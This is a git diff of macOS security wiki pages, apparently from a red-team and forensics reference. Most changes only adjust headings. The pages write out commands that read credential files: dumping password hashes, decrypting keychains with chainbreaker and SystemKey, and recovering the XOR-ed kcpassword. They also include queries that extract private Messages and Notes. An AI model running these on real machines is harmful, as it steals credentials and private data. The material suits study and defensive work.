+# Memory Artifacts
-### Swap Files
+## Swap Files
* **`/private/var/vm/swapfile0`**: This file is used as a **cache when physical memory fills up**. Data in physical memory will be pushed to the swapfile and then swapped back into physical memory if it’s needed again. More than one file can exist in here. For example, you might see swapfile0, swapfile1, and so on.
* **`/private/var/vm/sleepimage`**: When OS X goes into **hibernation**, **data stored in memory is put into the sleepimage file**. When the user comes back and wakes the computer, memory is restored from the sleepimage and the user can pick up where they left off.
@@ -818,7 +816,7 @@ ls -Rl /Library/Managed\ Preferences/
* However, the encryption of this file might be disabled. Check the out of `sysctl vm.swapusage`.
-### Dumping memory with osxpmem
+## Dumping memory with osxpmem
In order to dump the memory in a MacOS machine you can use [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
@@ -848,9 +846,9 @@ sudo su
cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip; unzip osxpmem-2.1.post4.zip; chown -R root:wheel osxpmem.app/MacPmem.kext; kextload osxpmem.app/MacPmem.kext; osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
```
-## Passwords
+# Passwords
-### Shadow Passwords
+## Shadow Passwords
Shadow password is stored withe the users configuration in plists located in **`/var/db/dslocal/nodes/Default/users/`**.\
The following oneliner can be use to dump **all the information about the users** (including hash info):
@@ -861,7 +859,7 @@ for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"
[**Scripts like this one**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) or [**this one**](https://github.com/octomagon/davegrohl.git) can be used to transform the hash to **hashcat** **format**.
-### Keychain Dump
+## Keychain Dump
Note that when using the security binary to **dump the passwords decrypted**, several prompts will ask the user to allow this operation.
@@ -874,7 +872,7 @@ security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychain
security dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root)
```
-### [Keychaindump](https://github.com/juuso/keychaindump)
+## [Keychaindump](https://github.com/juuso/keychaindump)
The attacker still needs to gain access to the system as well as escalate to **root** privileges in order to run **keychaindump**. This approach comes with its own conditions. As mentioned earlier, **upon login your keychain is unlocked by default** and remains unlocked while you use your system. This is for convenience so that the user doesn’t need to enter their password every time an application wishes to access the keychain. If the user has changed this setting and chosen to lock the keychain after every use, keychaindump will no longer work; it relies on an unlocked keychain to function.
@@ -894,7 +892,7 @@ sudo ./keychaindump
Base on this comment [https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) it looks like this tools isn't working anymore in Big Sur.
{% endhint %}
-### chainbreaker
+## chainbreaker
[**Chainbreaker**](https://github.com/n0fate/chainbreaker) can be used to extract the following types of information from an OSX keychain in a forensically sound manner:
@@ -911,24 +909,24 @@ Given the keychain unlock password, a master key obtained using [volafox](https:
Without one of these methods of unlocking the Keychain, Chainbreaker will display all other available information.
-#### Dump keychain keys
+### Dump keychain keys
```bash
#Dump all keys of the keychain (without the passwords)
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain
```
-#### Dump keychain keys (with passwords) with SystemKey
+### Dump keychain keys (with passwords) with SystemKey
```bash
# First, get the keychain decryption key
-## To get this decryption key you need to be root and SIP must be disabled
+# To get this decryption key you need to be root and SIP must be disabled
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
-### Use the previous key to decrypt the passwords
+## Use the previous key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
```
-#### Dump keychain keys (with passwords) cracking the hash
+### Dump keychain keys (with passwords) cracking the hash
```bash
# Get the keychain hash
@@ -939,20 +937,20 @@ hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
```
-#### Dump keychain keys (with passwords) with memory dump
+### Dump keychain keys (with passwords) with memory dump
[Follow these steps](./#dumping-memory-with-osxpmem) to perform a **memory dump**
```bash
#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords
-## Unformtunately volafox isn't working with the latest versions of MacOS
+# Unformtunately volafox isn't working with the latest versions of MacOS
python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump
#Try to extract the passwords using the extracted keychain passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
```
-#### Dump keychain keys (with passwords) using users password
+### Dump keychain keys (with passwords) using users password
If you know the users password you can use it to **dump and decrypt keychains that belong to the user**.
@@ -961,16 +959,16 @@ If you know the users password you can use it to **dump and decrypt keychains th
python2.7 chainbreaker.py --dump-all --password-prompt /Users//Library/Keychains/login.keychain-db
```
-### kcpassword
+## kcpassword
The **kcpassword** file is a file that holds the **user’s login password**, but only if the system owner has **enabled automatic login**. Therefore, the user will be automatically logged in without being asked for a password (which isn't very secure).
The password is stored in the file **`/etc/kcpassword`** xored with the key **`0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F`**. If the users password is longer than the key, the key will be reused.\
This makes the password pretty easy to recover, for example using scripts like [**this one**](https://gist.github.com/opshope/32f65875d45215c3677d).
-## **Library injection**
+# **Library injection**
-### Dylib Hijacking
+## Dylib Hijacking
As in Windows, in MacOS you can also **hijack dylibs** to make **applications** **execute** **arbitrary** **code**.\
However, the way **MacOS** applications **load** libraries is **more restricted** than in Windows. This implies that **malware** developers can still use this technique for **stealth**, but the probably to be able to **abuse this to escalate privileges is much lower**.
@@ -988,7 +986,7 @@ The way to **escalate privileges** abusing this functionality would be in the ra
**A nice scanner to find missing libraries in applications is** [**Dylib Hijack Scanner**](https://objective-see.com/products/dhs.html) **or a** [**CLI version**](https://github.com/pandazheng/DylibHijack)**.**\
**A nice report with technical details about this technique can be found** [**here**](https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x)**.**
-### **DYLD\_INSERT\_LIBRARIES**
+## **DYLD\_INSERT\_LIBRARIES**
> This is a colon separated **list of dynamic libraries** to l**oad before the ones specified in the program**. This lets you test new modules of existing dynamic shared libraries that are used in flat-namespace images by loading a temporary dynamic shared library with just the new modules. Note that this has no effect on images built a two-level namespace images using a dynamic shared library unless DYLD\_FORCE\_FLAT\_NAMESPACE is also used.
@@ -1004,9 +1002,9 @@ For example the dynamic loader (dyld) ignores the DYLD\_INSERT\_LIBRARIES enviro
For more details on the security features afforded by the hardened runtime, see Apple’s documentation: “[Hardened Runtime](https://developer.apple.com/documentation/security/hardened\_runtime)”
{% endhint %}
-## Interesting Information in Databases
+# Interesting Information in Databases
-### Messages
+## Messages
```bash
sqlite3 $HOME/Library/Messages/chat.db .tables
@@ -1016,7 +1014,7 @@ sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages'
sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'
```
-### Notifications
+## Notifications
You can find the Notifications data in `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/`
@@ -1027,7 +1025,7 @@ cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack
```
-### Notes
+## Notes
The users **notes** can be found in `~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite`
@@ -1038,7 +1036,7 @@ sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tabl
for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done
```
-## File Extensions Apps
+# File Extensions Apps
The following line can be useful to find the applications that can open files depending on the extension:
@@ -1089,7 +1087,7 @@ grep -A3 CFBundleTypeExtensions Info.plist | grep string
svg
```
-## Apple Scripts
+# Apple Scripts
It's a scripting language used for task automation **interacting with remote processes**. It makes pretty easy to **ask other processes to perform some actions**. **Malware** may abuse these features to abuse functions exported by other processes.\
For example, a malware could **inject arbitrary JS code in browser opened pages**. Or **auto click** some allow permissions requested to the user;
@@ -1118,7 +1116,7 @@ and tin this case the content cannot be decompiled even with `osadecompile`
However, there are still some tools that can be used to understand this kind of executables, [**read this research for more info**](https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/)). The tool [**applescript-disassembler**](https://github.com/Jinmo/applescript-disassembler) with [**aevt\_decompile**](https://github.com/SentineLabs/aevt\_decompile) will be very useful to understand how the script works.
-## MacOS Red Teaming
+# MacOS Red Teaming
Red Teaming in **environments where MacOS** is used instead of Windows can be very **different**. In this guide you will find some interesting tricks for this kind of assessments:
@@ -1126,13 +1124,13 @@ Red Teaming in **environments where MacOS** is used instead of Windows can be ve
[macos-red-teaming.md](macos-red-teaming.md)
{% endcontent-ref %}
-## MacOS Automatic Enumeration Tools
+# MacOS Automatic Enumeration Tools
* **MacPEAS**: [https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
* **Metasploit**: [https://github.com/rapid7/metasploit-framework/blob/master/modules/post/osx/gather/enum\_osx.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/osx/gather/enum\_osx.rb)
* **SwiftBelt**: [https://github.com/cedowens/SwiftBelt](https://github.com/cedowens/SwiftBelt)
-## Specific MacOS Commands
+# Specific MacOS Commands
```bash
#System info
@@ -1184,7 +1182,7 @@ caffeinate &
#Screenshot
-## This will ask for permission to the user
+# This will ask for permission to the user
screencapture -x /tmp/ss.jpg #Save screenshot in that file
@@ -1203,7 +1201,7 @@ arp -i en0 -l -a #Print the macOS device's ARP table
lsof -i -P -n | grep LISTEN
smbutil statshares -a #View smb shares mounted to the hard drive
-##networksetup - set or view network options: Proxies, FW options and more
+#networksetup - set or view network options: Proxies, FW options and more
networksetup -listallnetworkservices #List network services
networksetup -listallhardwareports #Hardware ports
networksetup -getinfo Wi-Fi #Wi-Fi info
@@ -1228,7 +1226,7 @@ say hello -v diego
#mexican: Juan, Paulina
#french: Thomas, Amelie
-############ High privileges actions
+########### High privileges actions
sudo purge #purge RAM
#Sharing preferences
sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist (enable ssh)
@@ -1242,7 +1240,7 @@ sudo killall -HUP mDNSResponder
```
-## References
+# References
* [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS)
* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
diff --git a/macos/macos-security-and-privilege-escalation/mac-os-architecture.md b/macos/macos-security-and-privilege-escalation/mac-os-architecture.md
index 667fa23c..1d8e4221 100644
--- a/macos/macos-security-and-privilege-escalation/mac-os-architecture.md
+++ b/macos/macos-security-and-privilege-escalation/mac-os-architecture.md
@@ -16,23 +16,22 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Mac OS Architecture
-### Kernel
+# Kernel
-#### XNU
+## XNU
The heart of Mac OS X is the **XNU kernel**. XNU is basically composed of a **Mach core** (covered in the next section) with supplementary features provided by Berkeley Software Distribution (**BSD**). Additionally, **XNU** is responsible for providing an **environment for kernel drivers called the I/O Kit**. **XNU is a Darwin package**, so all of the source **code** is **freely available**.
From a security researcher’s perspective, **Mac OS X feels just like a FreeBSD box with a pretty windowing system** and a large number of custom applications. For the most part, applications written for BSD will compile and run without modification on Mac OS X. All the tools you are accustomed to using in BSD are available in Mac OS X. Nevertheless, the fact that the **XNU kernel contains all the Mach code** means that some day, when you have to dig deeper, you’ll find many differences that may cause you problems and some you may be able to leverage for your own purposes.
-#### Mach
+## Mach
Mach was originated as a UNIX-compatible **operating system** back in 1984. One of its primary design **goals** was to be a **microkernel**; that is, to **minimize** the amount of code running in the **kernel** and allow many typical kernel functions, such as file system, networking, and I/O, to **run as user-level** Mach tasks.
**In XNU, Mach is responsible for many of the low-level operations** you expect from a kernel, such as processor scheduling and multitasking and virtual- memory management.
-#### BSD
+## BSD
The **kernel** also involves a large chunk of **code derived from the FreeBSD** code base. This code runs as part of the kernel along with Mach and uses the same address space. The F**reeBSD code within XNU may differ significantly from the original FreeBSD code**, as changes had to be made for it to coexist with Mach. FreeBSD provides many of the remaining operations the kernel needs, including:
@@ -45,7 +44,7 @@ The **kernel** also involves a large chunk of **code derived from the FreeBSD**
To get an idea of just how complicated the interaction between these two sets of code can be, consider the idea of the fundamental executing unit. **In BSD the fundamental unit is the process. In Mach it is a Mach thread**. The disparity is settled by each BSD-style process being associated with a Mach task consisting of exactly one Mach thread. When the BSD fork() system call is made, the BSD code in the kernel uses Mach calls to create a task and thread structure. Also, it is important to note that both the Mach and BSD layers have different security models. The **Mach security** model is **based** **on** **port** **rights**, and the **BSD** model is based on **process** **ownership**. Disparities between these two models have resulted in a **number of local privilege-escalation vulnerabilities**. Additionally, besides typical system cells, there are Mach traps that allow user-space programs to communicate with the kernel.
-#### I/O Kit - Drivers
+## I/O Kit - Drivers
I/O Kit is the open-source, object-oriented, **device-driver framework** in the XNU kernel and is responsible for the addition and management of **dynamically loaded device drivers**. These drivers allow for modular code to be added to the kernel dynamically for use with different hardware, for example. They are located in:
@@ -88,13 +87,13 @@ kextload com.apple.iokit.IOReportFamily
kextunload com.apple.iokit.IOReportFamily
```
-### Applications
+# Applications
A kernel without applications isn’t very useful. **Darwin** is the non-Aqua, **open-source core of Mac OS X**. Basically it is all the parts of Mac OS X for which the **source code is available**. The code is made available in the form of a **package that is easy to install**. There are hundreds of **available Darwin packages**, such as X11, GCC, and other GNU tools. Darwin provides many of the applications you may already use in BSD or Linux for Mac OS X. Apple has spent significant time **integrating these packages into their operating system** so that everything behaves nicely and has a consistent look and feel when possible.
On the **other** hand, many familiar pieces of Mac OS X are **not open source**. The main missing piece to someone running just the Darwin code will be **Aqua**, the **Mac OS X windowing and graphical-interface environment**. Additionally, most of the common **high-level applications**, such as Safari, Mail, QuickTime, iChat, etc., are not open source (although some of their components are open source). Interestingly, these closed-source applications often **rely on open- source software**, for example, Safari relies on the WebKit project for HTML and JavaScript rendering. **For perhaps this reason, you also typically have many more symbols in these applications when debugging than you would in a Windows environment.**
-#### **Universal binaries**
+## **Universal binaries**
Mac OS binaries usually are compiled as universal binaries. A **universal binary** can **support multiple architectures in the same file**.
@@ -113,7 +112,7 @@ gcc -arch ppc -arch i386 -o test-universal test.c
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
-#### Mach-o Format
+## Mach-o Format
.png>)
@@ -224,7 +223,7 @@ otool -L /bin/ls #Get libraries used by the binary
Or you can use the GUI tool [**machoview**](https://sourceforge.net/projects/machoview/).
-#### Bundles
+## Bundles
Basically, a bundle is a **directory structure** within the file system. Interestingly, by default this directory **looks like a single object in Finder**. The types of resources contained within a bundle may consist of applications, libraries, images, documentation, header files, etc. All these files are inside `.app/Contents/`
@@ -258,7 +257,7 @@ ls -lR /Applications/Safari.app/Contents
Contains the **oldest** **version** of **macOS** that the application is compatible with.
-#### Objective-C
+## Objective-C
Programs written in Objective-C **retain** their class declarations **when** **compiled** into (Mach-O) binaries. Such class declarations **include** the name and type of:
@@ -274,7 +273,7 @@ class-dump Kindle.app
Note that this names can be obfuscated to make the reversing of the binary more difficult.
-#### Native Packages
+## Native Packages
There are some projects that allow to generate a binary executable by MacOS containing script code which will be executed. Some examples are:
@@ -285,7 +284,7 @@ There are some projects that allow to generate a binary executable by MacOS cont
* **Electron:** JavaScript, HTML, and CSS.
* These binaries will use **Electron Framework.framework**. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in `.asar` files. These binaries will use Electron Framework.framework. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in **`.asar` files**. It's possible **unpack** such archives via the **asar** node module, or the **npx** **utility:** `npx asar extract StrongBox.app/Contents/Resources/app.asar appUnpacked`\\
-### References
+# References
* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=)
* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
diff --git a/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md b/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md
index 7a81aa39..82cbd4bd 100644
--- a/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md
+++ b/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md
@@ -17,23 +17,21 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# MacOS Apps - Inspecting, debugging and Fuzzing
+# Static Analysis
-## Static Analysis
-
-### otool
+## otool
```bash
otool -L /bin/ls #List dynamically linked libraries
otool -tv /bin/ps #Decompile application
```
-### SuspiciousPackage
+## SuspiciousPackage
[**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html) is a tool useful to inspect **.pkg** files (installers) and see what is inside before installing it.\
These installers have `preinstall` and `postinstall` bash scripts that malware authors usually abuse to **persist** **the** **malware**.
-### hdiutil
+## hdiutil
This tool allows to **mount** Apple disk images (**.dmg**) files to inspect them before running anything:
@@ -43,7 +41,7 @@ hdiutil attach ~/Downloads/Firefox\ 58.0.2.dmg
It will be mounted in `/Volumes`
-### Objective-C
+## Objective-C
When a function is called in a binary that uses objective-C, the compiled code instead of calling that function, it will call **`objc_msgSend`**. Which will be calling the final function:
@@ -65,13 +63,13 @@ The params this function expects are:
| **6th argument** | **r9** | **4th argument to the method** |
| **7th+ argument** | rsp+
(on the stack)
| **5th+ argument to the method** |
-### Packed binaries
+## Packed binaries
* Check for high entropy
* Check the strings (is there is almost no understandable string, packed)
* The UPX packer for MacOS generates a section called "\_\_XHDR"
-## Dynamic Analysis
+# Dynamic Analysis
{% hint style="warning" %}
Note that in order to debug binaries, **SIP needs to be disabled** (`csrutil disable` or `csrutil enable --without debug`) or to copy the binaries to a temporary folder and **remove the signature** with `codesign --remove-signature ` or allow the debugging of the binary (you can use [this script](https://gist.github.com/carlospolop/a66b8d72bb8f43913c4b5ae45672578b))
@@ -81,14 +79,14 @@ Note that in order to debug binaries, **SIP needs to be disabled** (`csrutil dis
Note that in order to **instrument system binarie**s, (such as `cloudconfigurationd`) on macOS, **SIP must be disabled** (just removing the signature won't work).
{% endhint %}
-### dtruss
+## dtruss
```bash
dtruss -c ls #Get syscalls of ls
dtruss -c -p 1000 #get syscalls of PID 1000
```
-### ktrace
+## ktrace
You can use this one even with **SIP activated**
@@ -96,7 +94,7 @@ You can use this one even with **SIP activated**
ktrace trace -s -S -t c -c ls | grep "ls("
```
-### dtrace
+## dtrace
It allows users access to applications at an extremely **low level** and provides a way for users to **trace** **programs** and even change their execution flow. Dtrace uses **probes** which are **placed throughout the kernel** and are at locations such as the beginning and end of system calls.
@@ -116,7 +114,7 @@ The probe name consists of four parts: the provider, module, function, and name
A more detailed explanation and more examples can be found in [https://illumos.org/books/dtrace/chp-intro.html](https://illumos.org/books/dtrace/chp-intro.html)
-#### Examples
+### Examples
* In line
@@ -165,15 +163,15 @@ syscall:::return
sudo dtrace -s syscalls_info.d -c "cat /etc/hosts"
```
-### ProcessMonitor
+## ProcessMonitor
[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor) is a very useful tool to check the process related actions a process is performing (for example, monitor which new processes a process is creating).
-### FileMonitor
+## FileMonitor
[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor) allows to monitor file events (such as creation, modifications, and deletions) providing detailed information about such events.
-### fs\_usage
+## fs\_usage
Allows to follow actions performed by processes:
@@ -182,12 +180,12 @@ fs_usage -w -f filesys ls #This tracks filesystem actions of proccess names cont
fs_usage -w -f network curl #This tracks network actions
```
-### TaskExplorer
+## TaskExplorer
[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) is useful to see the **libraries** used by a binary, the **files** it's using and the **network** connections.\
It also checks the binary processes against **virustotal** and show information about the binary.
-### lldb
+## lldb
**lldb** is the de **facto tool** for **macOS** binary **debugging**.
@@ -226,9 +224,9 @@ When calling the **`objc_sendMsg`** function, the **rsi** register holds the **n
`(lldb) reg read $rsi: rsi = 0x00000001000f1576 "startMiningWithPort:password:coreCount:slowMemory:currency:"`
{% endhint %}
-### Anti-Dynamic Analysis
+## Anti-Dynamic Analysis
-#### VM detection
+### VM detection
* The command **`sysctl hw.model`** returns "Mac" when the **host is a MacOS** but something different when it's a VM.
* Playing with the values of **`hw.logicalcpu`** and **`hw.physicalcpu`** some malwares try to detect if it's a VM.
@@ -240,9 +238,9 @@ When calling the **`objc_sendMsg`** function, the **rsi** register holds the **n
* As noted in this writeup, “[Defeating Anti-Debug Techniques: macOS ptrace variants](https://alexomara.com/blog/defeating-anti-debug-techniques-macos-ptrace-variants/)” :\
“_The message Process # exited with **status = 45 (0x0000002d)** is usually a tell-tale sign that the debug target is using **PT\_DENY\_ATTACH**_”
-## Fuzzing
+# Fuzzing
-### [ReportCrash](https://ss64.com/osx/reportcrash.html#:\~:text=ReportCrash%20analyzes%20crashing%20processes%20and%20saves%20a%20crash%20report%20to%20disk.\&text=ReportCrash%20also%20records%20the%20identity,when%20a%20crash%20is%20detected.)
+## [ReportCrash](https://ss64.com/osx/reportcrash.html#:\~:text=ReportCrash%20analyzes%20crashing%20processes%20and%20saves%20a%20crash%20report%20to%20disk.\&text=ReportCrash%20also%20records%20the%20identity,when%20a%20crash%20is%20detected.)
ReportCrash **analyzes crashing processes and saves a crash report to disk**. A crash report contains information that can **help a developer diagnose** the cause of a crash.\
For applications and other processes **running in the per-user launchd context**, ReportCrash runs as a LaunchAgent and saves crash reports in the user's `~/Library/Logs/DiagnosticReports/`\
@@ -260,7 +258,7 @@ launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.ReportCrash.Root.plist
```
-### Sleep
+## Sleep
While fuzzing in a MacOS it's important to not allow the Mac to sleep:
@@ -268,7 +266,7 @@ While fuzzing in a MacOS it's important to not allow the Mac to sleep:
* pmset, System Preferences
* [KeepingYouAwake](https://github.com/newmarcel/KeepingYouAwake)
-#### SSH Disconnect
+### SSH Disconnect
If you are fuzzing via a SSH connection it's important to make sure the session isn't going to day. So change the sshd\_config file with:
@@ -281,11 +279,11 @@ sudo launchctl unload /System/Library/LaunchDaemons/ssh.plist
sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist
```
-### Internal Handlers
+## Internal Handlers
[**Checkout this section**](./#file-extensions-apps) to find out how you can find which app is responsible of **handling the specified scheme or protocol**.
-### Enumerating Network Processes
+## Enumerating Network Processes
This interesting to find processes that are managing network data:
@@ -298,13 +296,13 @@ cat procs.txt
Or use `netstat` or `lsof`
-### More Fuzzing MacOS Info
+## More Fuzzing MacOS Info
* [https://github.com/bnagy/slides/blob/master/OSXScale.pdf](https://github.com/bnagy/slides/blob/master/OSXScale.pdf)
* [https://github.com/bnagy/francis/tree/master/exploitaben](https://github.com/bnagy/francis/tree/master/exploitaben)
* [https://github.com/ant4g0nist/crashwrangler](https://github.com/ant4g0nist/crashwrangler)
-## References
+# References
* [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS)
* [**https://www.youtube.com/watch?v=T5xfL9tEg44**](https://www.youtube.com/watch?v=T5xfL9tEg44)
diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md
index ff4069bb..01c11514 100644
--- a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md
+++ b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md
@@ -16,11 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## MacOS MDM
-### Basics
+# Basics
-#### What is MDM (Mobile Device Management)?
+## What is MDM (Mobile Device Management)?
[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile\_device\_management) (MDM) is a technology commonly used to **administer end-user computing devices** such as mobile phones, laptops, desktops and tablets. In the case of Apple platforms like iOS, macOS and tvOS, it refers to a specific set of features, APIs and techniques used by administrators to manage these devices. Management of devices via MDM requires a compatible commercial or open-source MDM server that implements support for the [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf).
@@ -28,7 +27,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Requires an **MDM server** which implements support for the MDM protocol
* MDM server can **send MDM commands**, such as remote wipe or “install this config”
-#### Basics What is DEP (Device Enrolment Program)?
+## Basics What is DEP (Device Enrolment Program)?
The [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP\_Guide.pdf) (DEP) is a service offered by Apple that **simplifies** Mobile Device Management (MDM) **enrollment** by offering **zero-touch configuration** of iOS, macOS, and tvOS devices. Unlike more traditional deployment methods, which require the end-user or administrator to take action to configure a device, or manually enroll with an MDM server, DEP aims to bootstrap this process, **allowing the user to unbox a new Apple device and have it configured for use in the organization almost immediately**.
@@ -42,21 +41,21 @@ Administrators can leverage DEP to automatically enroll devices in their organiz
Unfortunately, if an organization has not taken additional steps to **protect their MDM enrollment**, a simplified end-user enrollment process through DEP can also mean a simplified process for **attackers to enroll a device of their choosing in the organization’s MDM** server, assuming the "identity" of a corporate device.
{% endhint %}
-#### Basics What is SCEP (Simple Certificate Enrolment Protocol)?
+## Basics What is SCEP (Simple Certificate Enrolment Protocol)?
* A relatively old protocol, created before TLS and HTTPS were widespread.
* Gives clients a standardized way of sending a **Certificate Signing Request** (CSR) for the purpose of being granted a certificate. The client will ask the server to give him a signed certificate.
-#### What are Configuration Profiles (aka mobileconfigs)?
+## What are Configuration Profiles (aka mobileconfigs)?
* Apple’s official way of **setting/enforcing system configuration.**
* File format that can contain multiple payloads.
* Based on property lists (the XML kind).
* “can be signed and encrypted to validate their origin, ensure their integrity, and protect their contents.” Basics — Page 70, iOS Security Guide, January 2018.
-### Protocols
+# Protocols
-#### MDM
+## MDM
* Combination of APNs (**Apple server**s) + RESTful API (**MDM** **vendor** servers)
* **Communication** occurs between a **device** and a server associated with a **device** **management** **product**
@@ -64,7 +63,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
* All over **HTTPS**. MDM servers can be (and are usually) pinned.
* Apple grants the MDM vendor an **APNs certificate** for authentication
-#### DEP
+## DEP
* **3 APIs**: 1 for resellers, 1 for MDM vendors, 1 for device identity (undocumented):
* The so-called [DEP "cloud service" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). This is used by MDM servers to associate DEP profiles with specific devices.
@@ -83,7 +82,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
* Additional trusted certificates for server URL (optional pinning)
* Extra settings (e.g. which screens to skip in Setup Assistant)
-### Steps for enrolment and management
+# Steps for enrolment and management
1. Device record creation (Reseller, Apple): The record for the new device is created
2. Device record assignment (Customer): The device is assigned to a MDM server
@@ -97,7 +96,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
The file `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Library/PrivateFrameworks/ConfigurationProfiles.framework/ConfigurationProfiles.tbd` exports functions that can be considered **high-level "steps"** of the enrolment process.
-#### Step 4: DEP check-in - Getting the Activation Record
+## Step 4: DEP check-in - Getting the Activation Record
This part of the process occurs when a **user boots a Mac for the first time** (or after a complete wipe)
@@ -133,7 +132,7 @@ The response is a JSON dictionary with some important data like:
* **url**: URL of the MDM vendor host for the activation profile
* **anchor-certs**: Array of DER certificates used as trusted anchors
-#### **Step 5: Profile Retrieval**
+## **Step 5: Profile Retrieval**
.png>)
@@ -148,7 +147,7 @@ The response is a JSON dictionary with some important data like:
 (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
-#### Step 6: Profile Installation
+## Step 6: Profile Installation
* Once retrieved, **profile is stored on the system**
* This step begins automatically (if in **setup assistant**)
@@ -183,7 +182,7 @@ Typically, **activation profile** provided by an MDM vendor will **include the f
* Property: IdentityCertificateUUID
* Delivered via SCEP payload
-#### **Step 7: Listening for MDM commands**
+## **Step 7: Listening for MDM commands**
* After MDM check-in is complete, vendor can **issue push notifications using APNs**
* Upon receipt, handled by **`mdmclient`**
@@ -192,9 +191,9 @@ Typically, **activation profile** provided by an MDM vendor will **include the f
* **`ServerURLPinningCertificateUUIDs`** for pinning request
* **`IdentityCertificateUUID`** for TLS client certificate
-### Attacks
+# Attacks
-#### Enrolling Devices in Other Organisations
+## Enrolling Devices in Other Organisations
As previously commented, in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected:
@@ -203,7 +202,7 @@ Therefore, this could be a dangerous entrypoint for attackers if the enrolment p
[enrolling-devices-in-other-organisations.md](enrolling-devices-in-other-organisations.md)
{% endcontent-ref %}
-### **References**
+# **References**
